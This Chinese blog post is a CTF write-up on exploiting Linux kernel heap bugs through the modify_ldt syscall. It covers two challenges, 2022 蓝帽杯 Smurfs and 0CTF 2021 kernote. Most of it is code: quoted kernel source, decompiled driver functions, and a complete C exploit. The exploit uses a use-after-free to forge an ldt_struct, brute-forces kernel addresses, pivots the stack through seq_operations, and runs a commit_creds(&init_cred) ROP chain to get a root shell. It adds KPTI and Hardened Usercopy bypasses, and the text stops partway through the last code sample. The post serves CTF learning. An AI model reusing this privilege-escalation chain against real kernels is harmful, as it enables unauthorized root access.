modify_ldt利用 | 196082's blog

在内核的堆题目中，如果不存在读取数据的函数可能是毫无头绪，因为堆块即便是free之后储存的也只是堆地址，这也没办法进行partial write等操作。那么在面对没有读取函数的情况下应该采取什么方法呢？

利用原理

linux存在这样一个系统调用叫做modify_ldt，我们可以通过他获取或者修改当前进程的LDT

SYSCALL_DEFINE3(modify_ldt, int , func , void __user * , ptr ,
                unsigned long , bytecount)
{
    int ret = -ENOSYS;

    switch (func) {
        case 0:
            ret = read_ldt(ptr, bytecount);
            break;
        case 1:
            ret = write_ldt(ptr, bytecount, 1);
            break;
        case 2:
            ret = read_default_ldt(ptr, bytecount);
            break;
        case 0x11:
            ret = write_ldt(ptr, bytecount, 0);
            break;
    }
    /*
     * The SYSCALL_DEFINE() macros give us an 'unsigned long'
     * return type, but tht ABI for sys_modify_ldt() expects
     * 'int'.  This cast gives us an int-sized value in %rax
     * for the return code.  The 'unsigned' is necessary so
     * the compiler does not try to sign-extend the negative
     * return codes into the high half of the register when
     * taking the value from int->long.
     */
    return (unsigned int)ret;
}

可以看到这里传入的参数有三个，分别是func，ptr，bytecount，其中ptr指针应该指向的是user_desc结构体

struct user_desc {
    unsigned int  entry_number;
    unsigned int  base_addr;
    unsigned int  limit;
    unsigned int  seg_32bit:1;
    unsigned int  contents:2;
    unsigned int  read_exec_only:1;
    unsigned int  limit_in_pages:1;
    unsigned int  seg_not_present:1;
    unsigned int  useable:1;
};

static int read_ldt(void __user *ptr, unsigned long bytecount)
{
    struct mm_struct *mm = current->mm;
    unsigned long entries_size;
    int retval;

    down_read(&mm->context.ldt_usr_sem);

    if (!mm->context.ldt) {
        retval = 0;
        goto out_unlock;
    }

    if (bytecount > LDT_ENTRY_SIZE * LDT_ENTRIES)
        bytecount = LDT_ENTRY_SIZE * LDT_ENTRIES;

    entries_size = mm->context.ldt->nr_entries * LDT_ENTRY_SIZE;
    if (entries_size > bytecount)
        entries_size = bytecount;

    if (copy_to_user(ptr, mm->context.ldt->entries, entries_size)) {
        retval = -EFAULT;
        goto out_unlock;
    }

    if (entries_size != bytecount) {
        /* Zero-fill the rest and pretend we read bytecount bytes. */
        if (clear_user(ptr + entries_size, bytecount - entries_size)) {
            retval = -EFAULT;
            goto out_unlock;
        }
    }
    retval = bytecount;

    out_unlock:
    up_read(&mm->context.ldt_usr_sem);
    return retval;
}

在read_ldt函数中可以看到这里有一个copy_to_user函数，可以看到如果我们可以控制mm->context.ldt->entries那我们即可实现任意地址的读取

static int write_ldt(void __user *ptr, unsigned long bytecount, int oldmode)
{
    struct mm_struct *mm = current->mm;
    struct ldt_struct *new_ldt, *old_ldt;
    unsigned int old_nr_entries, new_nr_entries;
    struct user_desc ldt_info;
    struct desc_struct ldt;
    int error;

    error = -EINVAL;
    if (bytecount != sizeof(ldt_info))
        goto out;
    error = -EFAULT;
    if (copy_from_user(&ldt_info, ptr, sizeof(ldt_info)))
        goto out;

    error = -EINVAL;
    if (ldt_info.entry_number >= LDT_ENTRIES)
        goto out;
    if (ldt_info.contents == 3) {
        if (oldmode)
            goto out;
        if (ldt_info.seg_not_present == 0)
            goto out;
    }

    if ((oldmode && !ldt_info.base_addr && !ldt_info.limit) ||
        LDT_empty(&ldt_info)) {
        /* The user wants to clear the entry. */
        memset(&ldt, 0, sizeof(ldt));
    } else {
        if (!ldt_info.seg_32bit && !allow_16bit_segments()) {
            error = -EINVAL;
            goto out;
        }

        fill_ldt(&ldt, &ldt_info);
        if (oldmode)
            ldt.avl = 0;
    }

    if (down_write_killable(&mm->context.ldt_usr_sem))
        return -EINTR;

    old_ldt       = mm->context.ldt;
    old_nr_entries = old_ldt ? old_ldt->nr_entries : 0;
    new_nr_entries = max(ldt_info.entry_number + 1, old_nr_entries);

    error = -ENOMEM;
    new_ldt = alloc_ldt_struct(new_nr_entries);
    if (!new_ldt)
        goto out_unlock;

    if (old_ldt)
        memcpy(new_ldt->entries, old_ldt->entries, old_nr_entries * LDT_ENTRY_SIZE);

    new_ldt->entries[ldt_info.entry_number] = ldt;
    finalize_ldt_struct(new_ldt);

    /*
	 * If we are using PTI, map the new LDT into the userspace pagetables.
	 * If there is already an LDT, use the other slot so that other CPUs
	 * will continue to use the old LDT until install_ldt() switches
	 * them over to the new LDT.
	 */
    error = map_ldt_struct(mm, new_ldt, old_ldt ? !old_ldt->slot : 0);
    if (error) {
        /*
		 * This only can fail for the first LDT setup. If an LDT is
		 * already installed then the PTE page is already
		 * populated. Mop up a half populated page table.
		 */
        if (!WARN_ON_ONCE(old_ldt))
            free_ldt_pgtables(mm);
        free_ldt_struct(new_ldt);
        goto out_unlock;
    }

    install_ldt(mm, new_ldt);
    unmap_ldt_struct(mm, old_ldt);
    free_ldt_struct(old_ldt);
    error = 0;

    out_unlock:
    up_write(&mm->context.ldt_usr_sem);
    out:
    return error;
}

可以看到最后会将新的ldt放到mm中，然后释放掉旧的ldt，这里主要需要注意的是如何生存一个新的ldt，可以看到是调用了alloc_ldt_struct函数

static struct ldt_struct *alloc_ldt_struct(unsigned int num_entries)
{
    struct ldt_struct *new_ldt;
    unsigned int alloc_size;

    if (num_entries > LDT_ENTRIES)
        return NULL;

    new_ldt = kmalloc(sizeof(struct ldt_struct), GFP_KERNEL_ACCOUNT);
    if (!new_ldt)
        return NULL;

    BUILD_BUG_ON(LDT_ENTRY_SIZE != sizeof(struct desc_struct));
    alloc_size = num_entries * LDT_ENTRY_SIZE;

    /*
	 * Xen is very picky: it requires a page-aligned LDT that has no
	 * trailing nonzero bytes in any page that contains LDT descriptors.
	 * Keep it simple: zero the whole allocation and never allocate less
	 * than PAGE_SIZE.
	 */
    if (alloc_size > PAGE_SIZE)
        new_ldt->entries = __vmalloc(alloc_size, GFP_KERNEL_ACCOUNT | __GFP_ZERO);
    else
        new_ldt->entries = (void *)get_zeroed_page(GFP_KERNEL_ACCOUNT);

    if (!new_ldt->entries) {
        kfree(new_ldt);
        return NULL;
    }

    /* The new LDT isn't aliased for PTI yet. */
    new_ldt->slot = -1;

    new_ldt->nr_entries = num_entries;
    return new_ldt;
}

可以看到这里，kmalloc一个ldt_struct的size

struct ldt_struct {
    /*
	 * Xen requires page-aligned LDTs with special permissions.  This is
	 * needed to prevent us from installing evil descriptors such as
	 * call gates.  On native, we could merge the ldt_struct and LDT
	 * allocations, but it's not worth trying to optimize.
	 */
    struct desc_struct	*entries;
    unsigned int		nr_entries;

    /*
	 * If PTI is in use, then the entries array is not mapped while we're
	 * in user mode.  The whole array will be aliased at the addressed
	 * given by ldt_slot_va(slot).  We use two slots so that we can allocate
	 * and map, and enable a new LDT without invalidating the mapping
	 * of an older, still-in-use LDT.
	 *
	 * slot will be -1 if this LDT doesn't have an alias mapping.
	 */
    int			slot;
};

这里其实可以ldt_struct的size为0x10，那么这里的利用思路是

通过write_ldt控制ldt结构体
利用read_ldt进行爆破

这里为什么使用爆破呢？可以看到在copy_to_user的过程中如果并没有完成的话时会返回一个负数，那么我们可以通过这一方法来爆破出内核地址。

例题演示

2022 蓝帽杯半决赛 Smurfs

qemu-system-x86_64 \
    -m 512M \
    -kernel ./bzImage \
    -initrd ./rootfs.cpio \
    -monitor /dev/null \
    -append "root=/dev/ram console=ttyS0 oops=panic quiet panic=1 kaslr" \
    -cpu kvm64,+smep\
    -netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
    -nographic \
    -no-reboot \
    -s

首先题目开启的保护只是smep和kaslr

题目分析

__int64 __fastcall kernel_ioctl(file *file, unsigned int cmd, unsigned __int64 arg)
{
    __int64 v3; // rdx
    __int64 result; // rax
    int size; // r13d
    __int64 v6; // rax
    char *v7; // rbx
    char *buf; // r14
    __int64 v9; // rax
    char *v10; // r12
    __int64 v11; // r14
    __int64 buf_low; // r13
    add_args a1; // [rsp+0h] [rbp-48h] BYREF
    __int64 v14; // [rsp+10h] [rbp-38h]
    unsigned __int64 v15; // [rsp+18h] [rbp-30h]

    ((void (__fastcall *)(file *, unsigned int, unsigned __int64))_fentry__)(file, cmd, arg);
    v15 = __readgsqword(0x28u);
    result = 0LL;
    switch ( cmd )
    {
        case '0':
            if ( !copy_from_user(&a1, v3, 8LL) )
            {
                if ( LODWORD(a1.size) <= 2 && addrList[LODWORD(a1.size)] )
                    kfree();
                return 0LL;
            }
            return -22LL;
        case 'P':
            if ( !copy_from_user(&a1, v3, 0x18LL) )
            {
                if ( LODWORD(a1.size) <= 2 )
                {
                    v10 = addrList[LODWORD(a1.size)];
                    if ( v10 )
                    {
                        if ( LODWORD(a1.buf) <= 8 )
                        {
                            v11 = v14;
                            buf_low = LODWORD(a1.buf);
                            _check_object_size(addrList[LODWORD(a1.size)], LODWORD(a1.buf), 0LL);
                            copy_from_user(v10, v11, buf_low);
                            return 0LL;
                        }
                    }
                }
                return 0LL;
            }
            return -22LL;
        case ' ':
            if ( !copy_from_user(&a1, v3, 0x10LL) )
            {
                size = a1.size;
                if ( LODWORD(a1.size) <= 0x20 )
                {
                    v6 = _kmalloc(a1.size, 0xCC0LL);
                    v7 = (char *)v6;
                    if ( v6 )
                    {
                        buf = a1.buf;
                        if ( size < 0 )
                            BUG();
                        _check_object_size(v6, (unsigned int)size, 0LL);
                        if ( !copy_from_user(v7, buf, (unsigned int)size) )
                        {
                            if ( !addrList[0] )
                            {
                                v9 = 0LL;
                                goto LABEL_17;
                            }
                            v9 = 1LL;
                            if ( !addrList[1] )
                            {
                                LABEL_17:
                                addrList[v9] = v7;
                                return 0LL;
                            }
                        }
                    }
                }
                return 0LL;
            }
            return -22LL;
    }
    return result;
}

在ioctl函数存在三个功能，可以看到存在明显的UAF，但是在create时只能create两个堆块来使用，并且题目没有从内核读取数据到用户态的方法。

利用过程

那么根据上面所说的modify_ldt的利用原理来看，我们如果存在一个0x10大小的object，我们是可以控制到ldt_struct的，在write_ldt函数要想顺利的执行到下面我们还需要控制一下user_desc结构体。

desc.base_addr = 0xff0000;
desc.entry_number = 0x1000 / 8;
desc.limit = 0;
desc.seg_32bit = 0;
desc.contents = 0;
desc.read_exec_only = 0;
desc.limit_in_pages = 0;
desc.seg_not_present = 0;
desc.useable = 0;
desc.lm = 0;

当执行完write_ldt函数后，ldt_struct是我们可控的了，所以我们需要考虑泄露地址。

========================================================================================================================
    Start addr    |   Offset   |     End addr     |  Size   | VM area description
========================================================================================================================
                  |            |                  |         |
 0000000000000000 |    0       | 00007fffffffffff |  128 TB | user-space virtual memory, different per mm
__________________|____________|__________________|_________|___________________________________________________________
                  |            |                  |         |
 0000800000000000 | +128    TB | ffff7fffffffffff | ~16M TB | ... huge, almost 64 bits wide hole of non-canonical
                  |            |                  |         |     virtual memory addresses up to the -128 TB
                  |            |                  |         |     starting offset of kernel mappings.
__________________|____________|__________________|_________|___________________________________________________________
                                                            |
                                                            | Kernel-space virtual memory, shared between all processes:
____________________________________________________________|___________________________________________________________
                  |            |                  |         |
 ffff800000000000 | -128    TB | ffff87ffffffffff |    8 TB | ... guard hole, also reserved for hypervisor
 ffff880000000000 | -120    TB | ffff887fffffffff |  0.5 TB | LDT remap for PTI
 ffff888000000000 | -119.5  TB | ffffc87fffffffff |   64 TB | direct mapping of all physical memory (page_offset_base)
 ffffc88000000000 |  -55.5  TB | ffffc8ffffffffff |  0.5 TB | ... unused hole
 ffffc90000000000 |  -55    TB | ffffe8ffffffffff |   32 TB | vmalloc/ioremap space (vmalloc_base)
 ffffe90000000000 |  -23    TB | ffffe9ffffffffff |    1 TB | ... unused hole
 ffffea0000000000 |  -22    TB | ffffeaffffffffff |    1 TB | virtual memory map (vmemmap_base)
 ffffeb0000000000 |  -21    TB | ffffebffffffffff |    1 TB | ... unused hole
 ffffec0000000000 |  -20    TB | fffffbffffffffff |   16 TB | KASAN shadow memory
__________________|____________|__________________|_________|____________________________________________________________
                                                            |
                                                            | Identical layout to the 56-bit one from here on:
____________________________________________________________|____________________________________________________________
                  |            |                  |         |
 fffffc0000000000 |   -4    TB | fffffdffffffffff |    2 TB | ... unused hole
                  |            |                  |         | vaddr_end for KASLR
 fffffe0000000000 |   -2    TB | fffffe7fffffffff |  0.5 TB | cpu_entry_area mapping
 fffffe8000000000 |   -1.5  TB | fffffeffffffffff |  0.5 TB | ... unused hole
 ffffff0000000000 |   -1    TB | ffffff7fffffffff |  0.5 TB | %esp fixup stacks
 ffffff8000000000 | -512    GB | ffffffeeffffffff |  444 GB | ... unused hole
 ffffffef00000000 |  -68    GB | fffffffeffffffff |   64 GB | EFI region mapping space
 ffffffff00000000 |   -4    GB | ffffffff7fffffff |    2 GB | ... unused hole
 ffffffff80000000 |   -2    GB | ffffffff9fffffff |  512 MB | kernel text mapping, mapped to physical address 0
 ffffffff80000000 |-2048    MB |                  |         |
 ffffffffa0000000 |-1536    MB | fffffffffeffffff | 1520 MB | module mapping space
 ffffffffff000000 |  -16    MB |                  |         |
    FIXADDR_START | ~-11    MB | ffffffffff5fffff | ~0.5 MB | kernel-internal fixmap range, variable size and offset
 ffffffffff600000 |  -10    MB | ffffffffff600fff |    4 kB | legacy vsyscall ABI
 ffffffffffe00000 |   -2    MB | ffffffffffffffff |    2 MB | ... unused hole
__________________|____________|__________________|_________|___________________________________________________________

这里考虑搜索物理地址直接映射区

物理地址直接映射区即 direct mapping area，即线性映射区（不是线代那个线性映射），这块区域的线性地址到物理地址空间的映射是连续的，kmalloc 便从此处分配内存

而 vmalloc 则从 vmalloc/ioremap space 分配内存，起始地址为 vmalloc_base，这一块区域到物理地址间的映射是不连续的

这一块区域的起始地址称之为 page_offset_base，其地址为 0xffff888000000000，我们从这个地址开始搜索即可

因为在read_ldt函数中如果copy_to_user出现问题就会返回负数，所以我们可以利用这种方式来进行爆破。

while (1)
{
    edit(0, 0x8, buf);
    int ret = syscall(SYS_modify_ldt, 0, tmp, 8);
    if (ret < 0)
    {
        addr += 0x40000000;
        *(uint64_t *)buf = addr;
        continue;
    }
    printf("page_offset_base: %p\n", addr);
    break;
}

在那道page_offset_base之后我们可以尝试泄露dir的值，在距离page_offset_base不远处会出现一个指向kernel_base+0x40的指针，所以可以泄漏出内核的基地址

while (1)
{
    create(0x50, buf);
    edit(0, 0x8, buf);
    syscall(SYS_modify_ldt, 0, info, 0x1000);
    for (int i = 0; i < 0x1000 / 8; i++)
    {
        if (info[i] > vmlinux_base && (info[i] & 0xfff) == 0x040)
        {
            kernel_base = info[i] - 0x40;
            kernel_offset = kernel_base - vmlinux_base;
            printf("\033[32m\033[1m[+] Found kernel base: \033[0m%p\n", kernel_base);
            printf("\033[32m\033[1m[+] Kernel offset: \033[0m%p\n", kernel_offset);
        }
    }
    if (kernel_base)
    {
        break;
    }
    search_addr += 0x1000;
    *(unsigned long long *)buf = search_addr;
}

泄露完地址之后，就是想办法提升权限了。可以看出来这里并不存在任意地址写，所以思路还是栈迁移随后ROP，这里就需要利用到另一个结构体了

struct seq_operations {
    void * (*start) (struct seq_file *m, loff_t *pos);
    void (*stop) (struct seq_file *m, void *v);
    void * (*next) (struct seq_file *m, void *v, loff_t *pos);
    int (*show) (struct seq_file *m, void *v);
};

这个结构体的大小位0x20也满足题目所给的范围，当我们复写了start指针之后调用read就会call start指针控制rip并且此时的rax等于我们的，所以我们可以使用下面这个gadget来劫持rsp。

1	xchg eax,esp

这里没有办法将prepare_kernel_cred的返回值给到rdi，所以这里使用的是另一种方式，在内核当中有一个特殊的 cred —— init_cred，这是 init 进程的 cred，因此其权限为 root，且该 cred 并非是动态分配的，因此当我们泄露出内核基址之后我们也便能够获得 init_cred 的地址，那么我们就只需要执行一次 commit_creds(&init_cred) 便能完成提权

bypass kpti

我对于kpti的认知就是，cr3存在相应的页表，如果，在从内核态回到用户态时没修改cr3，那么在用户态就会因为找不到对应的东西出现段错误。

所以此时就有第一个bypass的思路，因为出现段错误肯定是有某个handle函数来处理，所以我们可以使用signal来修改信号的handle函数。

第二种就是正常进行rop，但是中间修改一下cr3的值

一般来说修改cr3需要的gadget是

1
2
3

mov rdi,cr3
or  rdi,1000h
mov cr3,rdi

综上，得出exp

#define _GNU_SOURCE
#include <err.h>
#include <errno.h>
#include <fcntl.h>
#include <inttypes.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <net/if.h>
#include <netinet/in.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <stdint.h>
#include <sys/mman.h>
#include <signal.h>
#include <sys/prctl.h>

struct create_chunk_arg
{
    long int size;
    unsigned long int buf;
};
struct edit_chunk_arg
{
    long int idx;
    long int size;
    unsigned long int buf;
};
struct delete_chunk_arg
{
    long int idx;
};

struct user_desc
{
    unsigned int entry_number;
    unsigned int base_addr;
    unsigned int limit;
    unsigned int seg_32bit : 1;
    unsigned int contents : 2;
    unsigned int read_exec_only : 1;
    unsigned int limit_in_pages : 1;
    unsigned int seg_not_present : 1;
    unsigned int useable : 1;
    unsigned int lm : 1;
};

int fd;
size_t user_cs, user_ss, user_rflags, user_sp;

void save_status()
{
    __asm__("mov user_cs, cs\n"
            "mov user_ss, ss\n"
            "mov user_sp, rsp\n"
            "pushf\n"
            "pop user_rflags\n");
    puts("[*]status has been saved.");
}

void print_hex(char *buf, int size)
{
    int i;
    puts("======================================");
    printf("data :\n");
    for (i = 0; i < (size / 8); i++)
    {
        if (i % 2 == 0)
        {
            printf("%d", i / 2);
        }
        printf(" %16llx", *(size_t *)(buf + i * 8));
        if (i % 2 == 1)
        {
            printf("\n");
        }
    }
    puts("======================================");
}

void get_shell()
{
    system("/bin/sh");
}

void create(long size, unsigned long *buf)
{
    struct create_chunk_arg arg;
    arg.size = size;
    arg.buf = buf;
    ioctl(fd, 0x20, &arg);
}

void delete (long idx)
{
    struct delete_chunk_arg arg;
    arg.idx = idx;
    ioctl(fd, 0x30, &arg);
}

void edit(long int idx, long int size, unsigned long *buf)
{
    struct edit_chunk_arg arg;
    arg.idx = idx;
    arg.size = size;
    arg.buf = buf;
    ioctl(fd, 0x50, &arg);
}

int main()
{
    signal(SIGSEGV, get_shell);
    save_status();
    char *buf[0x100];
    char *tmp[0x100];
    unsigned long *info = malloc(0x2000);
    unsigned long vmlinux_base = 0xffffffff81000000;
    memset(info, 0, 0x2000);
    unsigned long kernel_base = 0;
    unsigned long kernel_offset;
    struct user_desc desc;
    memset(buf, "\0", 0x100);
    memset(buf, 'a', 0x20);
    fd = open("/dev/kernelpwn", O_RDWR);
    if (fd < 0)
    {
        printf("[*]Error!");
        exit(0);
    }
    create(0x10, buf);
    create(0x20, buf);
    delete (0);
    desc.base_addr = 0xff0000;
    desc.entry_number = 0x1000 / 8;
    desc.limit = 0;
    desc.seg_32bit = 0;
    desc.contents = 0;
    desc.read_exec_only = 0;
    desc.limit_in_pages = 0;
    desc.seg_not_present = 0;
    desc.useable = 0;
    desc.lm = 0;
    syscall(SYS_modify_ldt, 1, &desc, sizeof(desc));
    unsigned long long addr = 0xffff888000000000;
    *(unsigned long long *)buf = addr;
    while (1)
    {
        edit(0, 0x8, buf);
        int ret = syscall(SYS_modify_ldt, 0, tmp, 8);
        if (ret < 0)
        {
            addr += 0x40000000;
            *(uint64_t *)buf = addr;
            continue;
        }
        printf("page_offset_base: %p\n", addr);
        break;
    }
    unsigned long search_addr = addr;
    *(unsigned long long *)buf = search_addr;
    while (1)
    {
        edit(0, 0x8, buf);
        syscall(SYS_modify_ldt, 0, info, 0x1000);
        for (int i = 0; i < 0x1000 / 8; i++)
        {
            if (info[i] > vmlinux_base && (info[i] & 0xfff) == 0x040)
            {
                kernel_base = info[i] - 0x40;
                kernel_offset = kernel_base - vmlinux_base;
                printf("\033[32m\033[1m[+] Found kernel base: \033[0m%p\n", kernel_base);
                printf("\033[32m\033[1m[+] Kernel offset: \033[0m%p\n", kernel_offset);
            }
        }
        if (kernel_base)
        {
            break;
        }
        search_addr += 0x1000;
        *(unsigned long long *)buf = search_addr;
    }

    unsigned long pop_rdi;
    unsigned long commit_creds;
    unsigned long prepare_kernel_cred;
    unsigned long xchg_eax_esp;
    unsigned long init_cred;
    unsigned long iretq;
    unsigned long swapgs;

    swapgs = 0xbc889f + kernel_base;
    iretq = 0x2df + kernel_base;
    xchg_eax_esp = 0xffffffff810e5bb9 + kernel_offset;
    pop_rdi = 0xffffffff8108c420 + kernel_offset;
    commit_creds = 0xc9540 + kernel_base;
    prepare_kernel_cred = 0xc99d0 + kernel_base;
    init_cred = 0x1a6b700 + kernel_base;

    delete (1);
    int seq_fd = open("/proc/self/stat", 0);
    unsigned long *fake_stack = mmap(xchg_eax_esp & 0xfffff000, 0x2000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);

    printf("fake_stack: 0x%llx\n", fake_stack);
    fake_stack = xchg_eax_esp & 0xffffffff;
    printf("fake_stack: 0x%llx\n", fake_stack);

    *(unsigned long long *)buf = xchg_eax_esp;
    unsigned long fake_seq_struct[0x20] = {0};
    fake_seq_struct[0] = xchg_eax_esp;
    edit(1, 0x8, fake_seq_struct);

    int i = 0;
    fake_stack[i++] = pop_rdi;
    fake_stack[i++] = init_cred;
    fake_stack[i++] = commit_creds;
    fake_stack[i++] = swapgs;
    fake_stack[i++] = iretq;
    fake_stack[i++] = (uint64_t)get_shell;
    fake_stack[i++] = user_cs;
    fake_stack[i++] = user_rflags;
    fake_stack[i++] = user_sp;
    fake_stack[i++] = user_ss;

    read(seq_fd, 0x1234, 0x1);
    return 0;
}

可以看到我们使用的gadget只有32位，并且rax指向的还是这个gadget的地址，所以这里调用mmap的方式就按照exp中的即可

如果这里使用第二种绕过kpti的话可以payload换成

unsigned long chang_cr3 = 0xffffffff81c00feb + kernel_offset;
fake_stack[i++] = pop_rdi;
fake_stack[i++] = init_cred;
fake_stack[i++] = commit_creds;
fake_stack[i++] = chang_cr3;
fake_stack[i++] = swapgs;
fake_stack[i++] = iretq;
fake_stack[i++] = (uint64_t)get_shell;
fake_stack[i++] = user_cs;
fake_stack[i++] = user_rflags;
fake_stack[i++] = user_sp;
fake_stack[i++] = user_ss;

0CTF 2021 final kernote

题目基本和上面一道题一致，不过这里的文件系统采用的ext4，需要拿到内部文件的方法就是

1
2
3

sudo mount ./rootfs.img ./rootfs
......
sudo umount ./rootfs

这道题目开启的保护有smep，smap，kpti以及kaslr，然后就是题目给了一个raedme文档：

CONFIG_SLAB=y
CONFIG_SLAB_FREELIST_RANDOM=y
CONFIG_SLAB_FREELIST_HARDENED=y
CONFIG_HARDENED_USERCOPY=y
CONFIG_STATIC_USERMODEHELPER=y
CONFIG_STATIC_USERMODEHELPER_PATH=""

可以看到题目使用的堆分配算法是slab而不是默认的slub，所以需要了解一下关于slab的一些特征：

开启了 Random Freelist（slab 的 freelist 会进行一定的随机化）
开启了 Hardened Freelist（slab 的 freelist 中的 object 的 next 指针会与一个 cookie 进行异或（参照 glibc 的 safe-linking））
开启了 Hardened Usercopy（在向内核拷贝数据时会进行检查，检查地址是否存在、是否在堆栈中、是否为 slab 中 object、是否非内核 .text 段内地址等等）
开启了 Static Usermodehelper Path（modprobe_path 为只读，不可修改）

题目分析

接下来开始直接进行逆向分析驱动

else if ( (_DWORD)a2 == 0x6667 )
{
    v10 = -1LL;
    if ( v3 <= 0xF )
    {
        a2 = 0xCC0LL;
        v8 = (unsigned __int64 *)kmem_cache_alloc_trace(kmalloc_caches[5], 0xCC0LL, 8LL, v5, -1LL);
        buf[v3] = v8;
        v10 = -(__int64)(v8 == 0LL);
    }
    goto LABEL_15;
}

首先从0x6667这个create来看，这里的kmem_cache_alloc_trace函数我在源码中找到

static __always_inline __alloc_size(3) void *kmem_cache_alloc_trace(struct kmem_cache *s,
                                                                    gfp_t flags, size_t size)
{
    void *ret = kmem_cache_alloc(s, flags);

    ret = kasan_kmalloc(s, ret, size, flags);
    return ret;
}

是这样定义的，只存在三个参数，第三个参数还是size，所以这里在ioctl中的create函数的size是固定的8字节

#ifdef CONFIG_SLAB
/*
 * The largest kmalloc size supported by the SLAB allocators is
 * 32 megabyte (2^25) or the maximum allocatable page order if that is
 * less than 32 MB.
 *
 * WARNING: Its not easy to increase this value since the allocators have
 * to do various tricks to work around compiler limitations in order to
 * ensure proper constant folding.
 */
#define KMALLOC_SHIFT_HIGH	((MAX_ORDER + PAGE_SHIFT - 1) <= 25 ? \
				(MAX_ORDER + PAGE_SHIFT - 1) : 25)
#define KMALLOC_SHIFT_MAX	KMALLOC_SHIFT_HIGH
#ifndef KMALLOC_SHIFT_LOW
#define KMALLOC_SHIFT_LOW	5
#endif
#endif

#ifdef CONFIG_SLUB
/*
 * SLUB directly allocates requests fitting in to an order-1 page
 * (PAGE_SIZE*2).  Larger requests are passed to the page allocator.
 */
#define KMALLOC_SHIFT_HIGH	(PAGE_SHIFT + 1)
#define KMALLOC_SHIFT_MAX	(MAX_ORDER + PAGE_SHIFT - 1)
#ifndef KMALLOC_SHIFT_LOW
#define KMALLOC_SHIFT_LOW	3
#endif
#endif

#ifdef CONFIG_SLOB
/*
 * SLOB passes all requests larger than one page to the page allocator.
 * No kmalloc array is necessary since objects of different sizes can
 * be allocated from the same page.
 */
#define KMALLOC_SHIFT_HIGH	PAGE_SHIFT
#define KMALLOC_SHIFT_MAX	(MAX_ORDER + PAGE_SHIFT - 1)
#ifndef KMALLOC_SHIFT_LOW
#define KMALLOC_SHIFT_LOW	3
#endif
#endif

/* Maximum allocatable size */
#define KMALLOC_MAX_SIZE	(1UL << KMALLOC_SHIFT_MAX)
/* Maximum size for which we actually use a slab cache */
#define KMALLOC_MAX_CACHE_SIZE	(1UL << KMALLOC_SHIFT_HIGH)
/* Maximum order allocatable via the slab allocator */
#define KMALLOC_MAX_ORDER	(KMALLOC_SHIFT_MAX - PAGE_SHIFT)

/*
 * Kmalloc subsystem.
 */
#ifndef KMALLOC_MIN_SIZE
#define KMALLOC_MIN_SIZE (1 << KMALLOC_SHIFT_LOW)
#endif

这里可以看到除了slab的最小的size为32，那么我们取出object也是从kmalloc-32中取出，并且可以看到slob和slub最小的size都是8。

所以虽然这里create时的size是固定的但是他申请出来的object的实际大小为32请求的大小也是32。

if ( (_DWORD)a2 == 0x6666 )
{
    v10 = -1LL;
    if ( v3 > 0xF )
        goto LABEL_15;
    note = buf[v3];
}

在0x6666中实现的是将buf中的object放到另一个全局变量，note中去

if ( (_DWORD)a2 == 0x6668 )
{
    v10 = -1LL;
    if ( v3 <= 0xF )
    {
        v9 = buf[v3];
        if ( v9 )
        {
            kfree(v9, a2, v4, v5, -1LL);
            v10 = 0LL;
            buf[v3] = 0LL;
        }
    }
    goto LABEL_15;
}

这里很明显的就是free，并且是非常明显的UAF

if ( (_DWORD)a2 == 0x6669 )
{
    v10 = -1LL;
    if ( note )
    {
        *note = v3;
        v10 = 0LL;
    }
    goto LABEL_15;
}

这里就是修改，但是值可以修改前8bit。这里题目其实还有一个选项，不过没什么用就不做解释了。

利用分析

相信提到这里就很清楚思路跟上面那道题基本是一致的了，因为最小size是32那也就决定了ldt_struct和seq_operations申请的size也都是32。

while (1)
{
    edit(*(unsigned long *)buf);
    int ret = syscall(SYS_modify_ldt, 0, tmp, 8);
    if (ret < 0)
    {
        addr += 0x40000000;
        *(uint64_t *)buf = addr;
        continue;
    }
    printf("page_offset_base: %p\n", addr);
    break;
}
unsigned long search_addr = addr;
*(unsigned long long *)buf = search_addr;
while (1)
{
    edit(*(unsigned long *)buf);
    syscall(SYS_modify_ldt, 0, info, 0x1000);
    for (int i = 0; i < 0x1000 / 8; i++)
    {
        if (info[i] > vmlinux_base && (info[i] & 0xfff) == 0x040)
        {
            kernel_base = info[i] - 0x40;
            kernel_offset = kernel_base - vmlinux_base;
            printf("\033[32m\033[1m[+] Found kernel base: \033[0m%p\n", kernel_base);
            printf("\033[32m\033[1m[+] Kernel offset: \033[0m%p\n", kernel_offset);
        }
    }
    if (kernel_base)
    {
        break;
    }
    search_addr += 0x1000;
    *(unsigned long long *)buf = search_addr;
}

这里是单纯使用上一道题目方法的代码

可以看到在下面搜索基地址，会直接崩溃掉，这是因为触发了Hardened Usercopy保护。在fork的系统调用中存在一条调用链：

sys_fork()=>kernel_clone()=>copy_process()=>copy_mm()=>dup_mm()=>dup_mmap()=>arch_dup_mmap()=>ldt_dup_context()

最后的ldt_dup_context函数如下：

int ldt_dup_context(struct mm_struct *old_mm, struct mm_struct *mm)
{
    struct ldt_struct *new_ldt;
    int retval = 0;

    if (!old_mm)
        return 0;

    mutex_lock(&old_mm->context.lock);
    if (!old_mm->context.ldt)
        goto out_unlock;

    new_ldt = alloc_ldt_struct(old_mm->context.ldt->nr_entries);
    if (!new_ldt) {
        retval = -ENOMEM;
        goto out_unlock;
    }

    memcpy(new_ldt->entries, old_mm->context.ldt->entries,
           new_ldt->nr_entries * LDT_ENTRY_SIZE);
    finalize_ldt_struct(new_ldt);

    retval = map_ldt_struct(mm, new_ldt, 0);
    if (retval) {
        free_ldt_pgtables(mm);
        free_ldt_struct(new_ldt);
        goto out_unlock;
    }
    mm->context.ldt = new_ldt;

    out_unlock:
    mutex_unlock(&old_mm->context.lock);
    return retval;
}

可以看到中间存在一条memcpy函数是将父进程的ldt结构体的entries指向的内容拷贝到子进程ldt结构体的entries指针指向的位置。这样避免了把dir直接copy_to_user给用户态，这里memcpy都是在内核态进行的，所以也就避免了Hardened Usercopy保护。所以这里应该改为：

pipe(pipe_fd);
while (1)
{
    edit(*(unsigned long *)buf);
    if (!fork())
    {
        syscall(SYS_modify_ldt, 0, info, 0x1000);
        for (int i = 0; i < 0x1000 / 8; i++)
        {
            if (info[i] > vmlinux_base && (info[i] & 0xfff) == 0x040)
            {
                kernel_base = info[i] - 0x40;
                kernel_offset = kernel_base - vmlinux_base;
